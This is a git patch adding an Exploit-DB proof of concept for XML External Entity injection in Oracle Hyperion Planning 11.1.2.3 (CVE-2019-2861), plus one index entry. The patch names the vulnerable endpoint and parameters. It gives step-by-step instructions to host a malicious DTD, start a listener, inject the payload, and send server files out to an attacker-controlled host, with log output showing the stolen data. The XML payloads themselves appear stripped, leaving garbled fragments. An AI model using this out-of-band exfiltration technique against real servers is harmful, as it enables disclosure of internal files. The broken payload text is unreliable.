From 50dee4d76905549065802f413243670096232bf9 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 1 Aug 2019 05:02:17 +0000
Subject: [PATCH] DB: 2019-08-01

1 changes to exploits/shellcodes

Oracle Hyperion Planning 11.1.2.3 - XML External Entity
---
 exploits/multiple/webapps/47196.txt | 53 +++++++++++++++++++++++++++++
 files_exploits.csv | 1 +
 2 files changed, 54 insertions(+)
 create mode 100644 exploits/multiple/webapps/47196.txt

diff --git a/exploits/multiple/webapps/47196.txt b/exploits/multiple/webapps/47196.txt
new file mode 100644
index 000000000..0a8a4f685
--- /dev/null
+++ b/exploits/multiple/webapps/47196.txt
@@ -0,0 +1,53 @@
+- Exploit Title: XXE Injection Oracle Hyperion
+- Exploit Author: Lucas Dinucci (idntk.lucdin@gmail.com)
+- Twitter: @identik1t
+- Vendor Homepage: https://www.oracle.com/applications/performance-management
+- Date: 02/11/2019
+- Affected Product: Oracle Hyperion Enterprise Performance Management System
+- Version: 11.1.2.3
+- CVE: CVE-2019-2861
+- Patch: https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
+- Vulnerability Type: https://cwe.mitre.org/data/definitions/611.html
+
+
+# XML External Entity (XXE) Injection
+
+
+The event.pt1:pt_region0:1:pc2:fvtbl, event.pt1:pt_region0:1:findBtn1 and oracle.adf.view.rich.monitoring.UserActivityInfo parameters are prone to XXE injection. An authenticated attacker could exploit this vulnerability to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution and denial of service attacks.
+
+Path: http://host:19000/calcmgr/faces/cmshell?_adf.ctrl-state=i38w0cig2_4
+
+Parameters: event.pt1:pt_region0:1:pc2:fvtbl, event.pt1:pt_region0:1:findBtn1 and oracle.adf.view.rich.monitoring.UserActivityInfo (POST REQUEST)
+
+
+# Proof-of-concept
+
+
+1 - Create a file and name it as xxe_poc with the following content, replacing with your server address:
+
+
+
+">
+
+
+2 - Start a webserver to receive the connection, such as:
+
+
+sudo python -m SimpleHTTPServer 80
+
+
+3 - Place the following payload in one of the vulnerable parameters, replacing with your server address:
+
+
+
+ %pe; %param1; %external;]>action
+
+
+4 - Data retrivial:
+
+Serving HTTP on 0.0.0.0 port 8000 ...
+
+192.168.13.1 - - [11/Feb/2019 04:59:47] "GET /xxe_poc HTTP/1.1" 200 -
+
+192.168.13.1 - - [11/Feb/2019 04:59:47] code 404, message File not found
+
+192.168.13.1 - - [11/Feb/2019 04:59:47] "GET /log?data=; HTTP/1.1" 200 -;%20for%2016-bit%20app%20support%20[fonts]%20[extensions]%20[mci%20extensions]%20[files] HTTP/1.1" 400 -
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 5a88c6797..6afefed2a 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -41568,3 +41568,4 @@ id,file,description,date,author,type,platform,port
 47184,exploits/php/webapps/47184.txt,"WordPress Theme Real Estate 2.8.9 - Cross-Site Scripting",2019-07-29,m0ze,webapps,php,80
 47185,exploits/php/webapps/47185.txt,"GigToDo 1.3 - Cross-Site Scripting",2019-07-29,m0ze,webapps,php,80
 47188,exploits/hardware/webapps/47188.py,"Amcrest Cameras 2.520.AC00.18.R - Unauthenticated Audio Streaming",2019-07-30,"Jacob Baines",webapps,hardware,
+47196,exploits/multiple/webapps/47196.txt,"Oracle Hyperion Planning 11.1.2.3 - XML External Entity",2019-07-31,"Lucas Dinucci",webapps,multiple,